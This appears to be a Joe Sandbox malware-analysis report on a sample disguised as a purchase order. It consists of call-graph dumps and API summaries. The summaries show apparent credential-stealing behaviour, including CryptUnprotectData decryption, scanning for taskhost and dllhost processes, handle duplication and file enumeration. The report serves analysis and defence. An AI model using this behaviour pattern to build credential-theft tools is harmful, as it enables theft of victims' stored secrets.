GetProcAddress 39166->39189 39168 4052f0 39169 40b273 27 API calls 39168->39169 39170 4052fd 39169->39170 39190 405211 GetProcAddress 39170->39190 39172 405306 39173 40b273 27 API calls 39172->39173 39174 405313 39173->39174 39191 405211 GetProcAddress 39174->39191 39176 40531c 39177 40b273 27 API calls 39176->39177 39178 405329 39177->39178 39192 405211 GetProcAddress 39178->39192 39180 405332 39180->39137 39182 40b58d 27 API calls 39181->39182 39183 40b18c 39182->39183 39183->39144 39184->39148 39185->39152 39186->39156 39187->39160 39188->39164 39189->39168 39190->39172 39191->39176 39192->39180 39194 405220 39 API calls 39193->39194 39195 405369 39194->39195 39195->38926 39195->38927 39196->38929 39197->38933 39198->38930 39199->38927 39201 40440c FreeLibrary 39200->39201 39202 40436d 39201->39202 39203 40a804 8 API calls 39202->39203 39204 404377 39203->39204 39205 404383 39204->39205 39206 404405 39204->39206 39207 40b273 27 API calls 39205->39207 39206->38498 39206->38499 39206->38500 39208 40438d GetProcAddress 39207->39208 39209 40b273 27 API calls 39208->39209 39210 4043a7 GetProcAddress 39209->39210 39211 40b273 27 API calls 39210->39211 39212 4043ba GetProcAddress 39211->39212 39213 40b273 27 API calls 39212->39213 39214 4043ce GetProcAddress 39213->39214 39215 40b273 27 API calls 39214->39215 39216 4043e2 GetProcAddress 39215->39216 39217 4043f1 39216->39217 39218 4043f7 39217->39218 39219 40440c FreeLibrary 39217->39219 39218->39206 39219->39206 39221 404413 FreeLibrary 39220->39221 39222 40441e 39220->39222 39221->39222 39222->38515 39223->38511 39225 40447e 39224->39225 39226 40442e 39224->39226 39227 404485 CryptUnprotectData 39225->39227 39228 40449c 39225->39228 39229 40b2cc 27 API calls 39226->39229 39227->39228 39228->38511 39230 404438 39229->39230 39231 40a804 8 API calls 39230->39231 39232 40443e 39231->39232 39233 404445 39232->39233 39234 404467 39232->39234 39235 40b273 27 API calls 39233->39235 39234->39225 39237 404475 FreeLibrary 39234->39237 39236 40444f GetProcAddress 39235->39236 39236->39234 39238 404460 39236->39238 39237->39225 39238->39234 39240 4135f6 39239->39240 39241 4135eb FreeLibrary 39239->39241 39240->38518 39241->39240 39243 4449c4 39242->39243 39244 444a52 39242->39244 39245 40b2cc 27 API calls 39243->39245 39244->38535 39244->38536 39246 4449cb 39245->39246 39247 40a804 8 API calls 39246->39247 39248 4449d1 39247->39248 39249 40b273 27 API calls 39248->39249 39250 4449dc GetProcAddress 39249->39250 39251 40b273 27 API calls 39250->39251 39252 4449f3 GetProcAddress 39251->39252 39253 40b273 27 API calls 39252->39253 39254 444a04 GetProcAddress 39253->39254 39255 40b273 27 API calls 39254->39255 39256 444a15 GetProcAddress 39255->39256 39257 40b273 27 API calls 39256->39257 39258 444a26 GetProcAddress 39257->39258 39259 40b273 27 API calls 39258->39259 39260 444a37 GetProcAddress 39259->39260 39261 40b273 27 API calls 39260->39261 39262 444a48 GetProcAddress 39261->39262 39262->39244 39263->38546 39264->38546 39265->38546 39266->38546 39267->38537 39269 403a29 39268->39269 39283 403bed memset memset 39269->39283 39271 403ae7 39296 40b1ab free free 39271->39296 39273 403a3f memset 39277 403a2f 39273->39277 39274 403aef 39274->38554 39275 40a8d0 7 API calls 39275->39277 39276 409d1f 6 API calls 39276->39277 39277->39271 39277->39273 39277->39275 39277->39276 39278 409b98 GetFileAttributesW 39277->39278 39278->39277 39280 40a051 GetFileTime CloseHandle 39279->39280 39281 4039ca CompareFileTime 39279->39281 39280->39281 39281->38554 39282->38553 39284 414c2e 17 API calls 39283->39284 39285 403c38 39284->39285 39286 409719 2 API calls 39285->39286 39287 403c3f wcscat 39286->39287 39288 414c2e 17 API calls 39287->39288 39289 403c61 39288->39289 39290 409719 2 API calls 39289->39290 39291 403c68 wcscat 39290->39291 39297 403af5 39291->39297 39294 403af5 20 API calls 39295 403c95 39294->39295 39295->39277 39296->39274 39298 403b02 39297->39298 39299 40ae18 9 API calls 39298->39299 39307 403b37 39299->39307 39300 403bdb 39301 40aebe FindClose 39300->39301 39303 403be6 39301->39303 39302 40add4 wcscmp wcscmp 39302->39307 39303->39294 39304 40ae18 9 API calls 39304->39307 39305 40ae51 9 API calls 39305->39307 39306 40aebe FindClose 39306->39307 39307->39300 39307->39302 39307->39304 39307->39305 39307->39306 39308 40a8d0 7 API calls 39307->39308 39308->39307 39310 409d1f 6 API calls 39309->39310 39311 404190 39310->39311 39324 409b98 GetFileAttributesW 39311->39324 39313 40419c 39314 4041a7 6 API calls 39313->39314 39315 40435c 39313->39315 39317 40424f 39314->39317 39315->38580 39317->39315 39318 40425e memset 39317->39318 39320 409d1f 6 API calls 39317->39320 39321 40a8ab 9 API calls 39317->39321 39325 414842 39317->39325 39318->39317 39319 404296 wcscpy 39318->39319 39319->39317 39320->39317 39322 4042b6 memset memset _snwprintf wcscpy 39321->39322 39322->39317 39323->38578 39324->39313 39328 41443e 39325->39328 39327 414866 39327->39317 39329 41444b 39328->39329 39330 414451 39329->39330 39331 4144a3 GetPrivateProfileStringW 39329->39331 39332 414491 39330->39332 39333 414455 wcschr 39330->39333 39331->39327 39335 414495 WritePrivateProfileStringW 39332->39335 39333->39332 39334 414463 _snwprintf 39333->39334 39334->39335 39335->39327 39336->38584 39338 40b2cc 27 API calls 39337->39338 39339 409615 39338->39339 39340 409d1f 6 API calls 39339->39340 39341 409625 39340->39341 39366 409b98 GetFileAttributesW 39341->39366 39343 409634 39344 409648 39343->39344 39367 4091b8 memset 39343->39367 39346 40b2cc 27 API calls 39344->39346 39349 408801 39344->39349 39347 40965d 39346->39347 39348 409d1f 6 API calls 39347->39348 39350 40966d 39348->39350 39349->38587 39349->38614 39419 409b98 GetFileAttributesW 39350->39419 39352 40967c 39352->39349 39353 409681 39352->39353 39420 409529 72 API calls 39353->39420 39355 409690 39355->39349 39356->38609 39366->39343 39421 40a6e6 WideCharToMultiByte 39367->39421 39369 409202 39422 444432 39369->39422 39372 40b273 27 API calls 39373 409236 39372->39373 39468 438552 39373->39468 39376 409383 39378 40b273 27 API calls 39376->39378 39379 409399 39378->39379 39382 438552 134 API calls 39379->39382 39400 4093a3 39382->39400 39386 4094ff 39389 4251c4 137 API calls 39389->39400 39393 4093df 39395 4253cf 17 API calls 39395->39400 39399 40951d 39399->39344 39400->39386 39400->39389 39400->39393 39400->39395 39403 4093e4 39400->39403 39419->39352 39420->39355 39421->39369 39518 4438b5 39422->39518 39424 44444c 39425 409215 39424->39425 39532 415a6d 39424->39532 39425->39372 39425->39399 39427 4442e6 11 API calls 39429 44469e 39427->39429 39428 444486 39430 4444b9 memcpy 39428->39430 39467 4444a4 39428->39467 39429->39425 39432 443d90 111 API calls 39429->39432 39536 415258 39430->39536 39432->39425 39433 444524 39434 444541 39433->39434 39435 44452a 39433->39435 39539 444316 39434->39539 39436 416935 16 API calls 39435->39436 39436->39467 39439 444316 18 API calls 39440 444563 39439->39440 39441 444316 18 API calls 39440->39441 39442 44456f 39441->39442 39467->39427 39657 438460 39468->39657 39470 409240 39470->39376 39471 4251c4 39470->39471 39708 424f07 39471->39708 39473 4251e4 39519 4438d0 39518->39519 39529 4438c9 39518->39529 39606 415378 memcpy memcpy 39519->39606 39529->39424 39533 415a77 39532->39533 39534 415a8d 39533->39534 39535 415a7e memset 39533->39535 39534->39428 39535->39534 39537 4438b5 11 API calls 39536->39537 39538 41525d 39537->39538 39538->39433 39540 444328 39539->39540 39541 444423 39540->39541 39542 44434e 39540->39542 39607 4446ea 11 API calls 39541->39607 39543 432d4e 3 API calls 39542->39543 39545 44435a 39543->39545 39547 444375 39545->39547 39552 44438b 39545->39552 39546 432d4e 3 API calls 39548 4443ec 39546->39548 39549 416935 16 API calls 39547->39549 39550 444381 39548->39550 39551 416935 16 API calls 39548->39551 39549->39550 39550->39439 39551->39550 39552->39546 39607->39550 39669 41703f 39657->39669 39659 43847a 39660 43848a 39659->39660 39661 43847e 39659->39661 39676 438270 39660->39676 39706 4446ea 11 API calls 39661->39706 39666 4384bb 39667 438270 134 API calls 39666->39667 39668 438488 39667->39668 39668->39470 39670 417044 39669->39670 39671 41705c 39669->39671 39673 416760 11 API calls 39670->39673 39675 417055 39670->39675 39672 417075 39671->39672 39674 41707a 11 API calls 39671->39674 39672->39659 39673->39675 39674->39670 39675->39659 39677 415a91 memset 39676->39677 39678 43828d 39677->39678 39679 438297 39678->39679 39680 438341 39678->39680 39682 4382d6 39678->39682 39681 415c7d 16 API calls 39679->39681 39683 44358f 19 API calls 39680->39683 39684 438458 39681->39684 39685 4382fb 39682->39685 39686 4382db 39682->39686 39696 438318 39683->39696 39684->39668 39707 424f26 123 API calls 39684->39707 39688 415c23 memcpy 39685->39688 39687 416935 16 API calls 39686->39687 39689 4382e9 39687->39689 39690 438305 39688->39690 39691 415c7d 16 API calls 39689->39691 39693 44358f 19 API calls 39690->39693 39690->39696 39691->39679 39692 438373 39695 438383 39692->39695 39697 4300e8 memset memset memcpy 39692->39697 39693->39696 39694 43819e 115 API calls 39694->39692 39698 4383cd 39695->39698 39700 415c23 memcpy 39695->39700 39696->39692 39696->39694 39697->39695 39700->39698 39706->39668 39707->39666 39709 424f1f 39708->39709 39710 424f0c 39708->39710 39729 424eea 11 API calls 39709->39729 39728 416760 11 API calls 39710->39728 39713 424f18 39713->39473 39714 424f24 39714->39473 39728->39713 39729->39714 39807 413f4f 39780->39807 39783 413f37 K32GetModuleFileNameExW 39784 413f4a 39783->39784 39784->38644 39786 413969 wcscpy 39785->39786 39787 41396c wcschr 39785->39787 39790 413a3a 39786->39790 39787->39786 39789 41398e 39787->39789 39812 4097f7 wcslen wcslen _memicmp 39789->39812 39790->38644 39792 41399a 39793 4139a4 memset 39792->39793 39794 4139e6 39792->39794 39813 409dd5 GetWindowsDirectoryW wcscpy 39793->39813 39796 413a31 wcscpy 39794->39796 39797 4139ec memset 39794->39797 39796->39790 39814 409dd5 GetWindowsDirectoryW wcscpy 39797->39814 39798 4139c9 wcscpy wcscat 39798->39790 39800 413a11 memcpy wcscat 39800->39790 39802 413cb0 GetModuleHandleW 39801->39802 39803 413cda 39801->39803 39802->39803 39806 413cbf GetProcAddress 39802->39806 39804 413ce3 GetProcessTimes 39803->39804 39805 413cf6 39803->39805 39804->38649 39805->38649 39806->39803 39808 413f2f 39807->39808 39809 413f54 39807->39809 39808->39783 39808->39784 39810 40a804 8 API calls 39809->39810 39811 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39810->39811 39811->39808 39812->39792 39813->39798 39814->39800 39815->38669 39816->38693 39818 409cf9 GetVersionExW 39817->39818 39819 409d0a 39817->39819 39818->39819 39819->38698 39819->38704 39820->38705 39821->38709 39822->38711 39823->38777 39825 40bba5 39824->39825 39869 40cc26 39825->39869 39828 40bd4b 39897 40cc0c 39828->39897 39833 40b2cc 27 API calls 39834 40bbef 39833->39834 39890 40ccf0 39834->39890 39836 40bbf5 39836->39828 39894 40ccb4 39836->39894 39839 40cf04 17 API calls 39840 40bc2e 39839->39840 39841 40bd43 39840->39841 39842 40b2cc 27 API calls 39840->39842 39843 40cc0c 4 API calls 39841->39843 39844 40bc40 39842->39844 39843->39828 39845 40ccf0 _wcsicmp 39844->39845 39846 40bc46 39845->39846 39846->39841 39847 40bc61 memset memset WideCharToMultiByte 39846->39847 39904 40103c strlen 39847->39904 39849 40bcc0 39850 40b273 27 API calls 39849->39850 39851 40bcd0 memcmp 39850->39851 39851->39841 39852 40bce2 39851->39852 39853 404423 38 API calls 39852->39853 39854 40bd10 39853->39854 39854->39841 39855 40bd3a LocalFree 39854->39855 39856 40bd1f memcpy 39854->39856 39855->39841 39856->39855 39857->38792 39858->38829 39859->38829 39860->38829 39861->38829 39862->38829 39863->38829 39864->38829 39865->38829 39866->38829 39867->38804 39868->38826 39905 4096c3 CreateFileW 39869->39905 39871 40cc34 39872 40cc3d GetFileSize 39871->39872 39880 40bbca 39871->39880 39873 40afcf 2 API calls 39872->39873 39874 40cc64 39873->39874 39906 40a2ef ReadFile 39874->39906 39876 40cc71 39907 40ab4a MultiByteToWideChar 39876->39907 39878 40cc95 CloseHandle 39879 40b04b ??3@YAXPAX 39878->39879 39879->39880 39880->39828 39881 40cf04 39880->39881 39882 40b633 free 39881->39882 39883 40cf14 39882->39883 39913 40b1ab free free 39883->39913 39885 40cf1b 39886 40cfef 39885->39886 39889 40bbdd 39885->39889 39914 40cd4b 39885->39914 39888 40cd4b 14 API calls 39886->39888 39888->39889 39889->39828 39889->39833 39891 40ccfd 39890->39891 39893 40cd3f 39890->39893 39892 40cd26 _wcsicmp 39891->39892 39891->39893 39892->39891 39892->39893 39893->39836 39895 40aa29 6 API calls 39894->39895 39896 40bc26 39895->39896 39896->39839 39898 40b633 free 39897->39898 39899 40cc15 39898->39899 39900 40aa04 free 39899->39900 39901 40cc1d 39900->39901 39955 40b1ab free free 39901->39955 39903 40b7d4 memset CreateFileW 39903->38784 39903->38785 39904->39849 39905->39871 39906->39876 39908 40ab93 39907->39908 39909 40ab6b 39907->39909 39908->39878 39910 40a9ce 4 API calls 39909->39910 39911 40ab74 39910->39911 39912 40ab7c MultiByteToWideChar 39911->39912 39912->39908 39913->39885 39915 40cd7b 39914->39915 39916 40aa29 6 API calls 39915->39916 39920 40cd89 39916->39920 39917 40cef5 39918 40aa04 free 39917->39918 39919 40cefd 39918->39919 39919->39885 39920->39917 39921 40aa29 6 API calls 39920->39921 39922 40ce1d 39921->39922 39923 40aa29 6 API calls 39922->39923 39924 40ce3e 39923->39924 39925 40ce6a 39924->39925 39948 40abb7 wcslen memmove 39924->39948 39926 40ce9f 39925->39926 39951 40abb7 wcslen memmove 39925->39951 39929 40a8d0 7 API calls 39926->39929 39932 40ceb5 39929->39932 39930 40ce56 39949 40aa71 wcslen 39930->39949 39931 40ce8b 39952 40aa71 wcslen 39931->39952 39936 40a8d0 7 API calls 39932->39936 39935 40ce5e 39950 40abb7 wcslen memmove 39935->39950 39939 40cecb 39936->39939 39937 40ce93 39953 40abb7 wcslen memmove 39937->39953 39954 40d00b malloc memcpy free free 39939->39954 39942 40cedd 39943 40aa04 free 39942->39943 39944 40cee5 39943->39944 39945 40aa04 free 39944->39945 39946 40ceed 39945->39946 39947 40aa04 free 39946->39947 39947->39917 39948->39930 39949->39935 39950->39925 39951->39931 39952->39937 39953->39926 39954->39942 39955->39903 39956->38844 39957->38852 40453 441819 40456 430737 40453->40456 40455 441825 40457 430756 40456->40457 40469 43076d 40456->40469 40458 430774 40457->40458 40459 43075f 40457->40459 40471 43034a memcpy 40458->40471 40470 4169a7 11 API calls 40459->40470 40462 4307ce 40464 430819 memset 40462->40464 40472 415b2c 11 API calls 40462->40472 40463 43077e 40463->40462 40467 4307fa 40463->40467 40463->40469 40464->40469 40466 4307e9 40466->40464 40466->40469 40473 4169a7 11 API calls 40467->40473 40469->40455 40470->40469 40471->40463 40472->40466 40473->40469 40474 41493c EnumResourceNamesW

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 353 40de5a 351->353 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 353->355 357 40de74-40de78 355->357 358 40de65-40de6c 355->358 357->352 357->355 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                              APIs
                                                              • memset.MSVCRT ref: 0040DDAD
                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                              • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                              • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                              • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                              • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                              • _wcsicmp.MSVCRT ref: 0040DEB2
                                                              • _wcsicmp.MSVCRT ref: 0040DEC5
                                                              • _wcsicmp.MSVCRT ref: 0040DED8
                                                              • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                              • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                              • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                              • memset.MSVCRT ref: 0040DF5F
                                                              • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                              • _wcsicmp.MSVCRT ref: 0040DFB2
                                                              • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                              • String ID: dllhost.exe$p+Fw@FFw@BFw$taskhost.exe$taskhostex.exe
                                                              • API String ID: 708747863-4209158791
                                                              • Opcode ID: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                              • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                              • Opcode Fuzzy Hash: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                              • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 635 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 638 413f00-413f11 Process32NextW 635->638 639 413da5-413ded OpenProcess 638->639 640 413f17-413f24 CloseHandle 638->640 641 413eb0-413eb5 639->641 642 413df3-413e26 memset call 413f27 639->642 641->638 644 413eb7-413ebd 641->644 650 413e79-413e9d call 413959 call 413ca4 642->650 651 413e28-413e35 642->651 645 413ec8-413eda call 4099f4 644->645 646 413ebf-413ec6 free 644->646 648 413edb-413ee2 645->648 646->648 655 413ee4 648->655 656 413ee7-413efe 648->656 662 413ea2-413eae CloseHandle 650->662 653 413e61-413e68 651->653 654 413e37-413e44 GetModuleHandleW 651->654 653->650 659 413e6a-413e76 653->659 654->653 658 413e46-413e5c GetProcAddress 654->658 655->656 656->638 658->653 659->650 662->641
                                                              APIs
                                                                • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                              • memset.MSVCRT ref: 00413D7F
                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                              • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                              • memset.MSVCRT ref: 00413E07
                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                              • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                              • free.MSVCRT ref: 00413EC1
                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                              • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                              • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                              • API String ID: 1344430650-1740548384
                                                              • Opcode ID: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                              • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                              • Opcode Fuzzy Hash: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                              • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 754 40b58d-40b59e 755 40b5a4-40b5c0 GetModuleHandleW FindResourceW 754->755 756 40b62e-40b632 754->756 757 40b5c2-40b5ce LoadResource 755->757 758 40b5e7 755->758 757->758 759 40b5d0-40b5e5 SizeofResource LockResource 757->759 760 40b5e9-40b5eb 758->760 759->760 760->756 761 40b5ed-40b5ef 760->761 761->756 762 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 761->762 762->756
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?, AE,?,?,00411B78,?,General,?,00000000,00000001), ref: 0040B5A5
                                                              • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                              • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                              • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                              • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                              • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                              • String ID: AE$BIN
                                                              • API String ID: 1668488027-3931574542
                                                              • Opcode ID: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                              • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                              • Opcode Fuzzy Hash: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                              • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                              APIs
                                                              • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                              • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                                                              • String ID:
                                                              • API String ID: 767404330-0
                                                              • Opcode ID: 91f5c8417cc05eb5371089ee99512099cd95d68580e827c1857cd6a30ed1daf0
                                                              • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                              • Opcode Fuzzy Hash: 91f5c8417cc05eb5371089ee99512099cd95d68580e827c1857cd6a30ed1daf0
                                                              • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                              APIs
                                                              • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                              • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: FileFind$FirstNext
                                                              • String ID:
                                                              • API String ID: 1690352074-0
                                                              • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                              • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
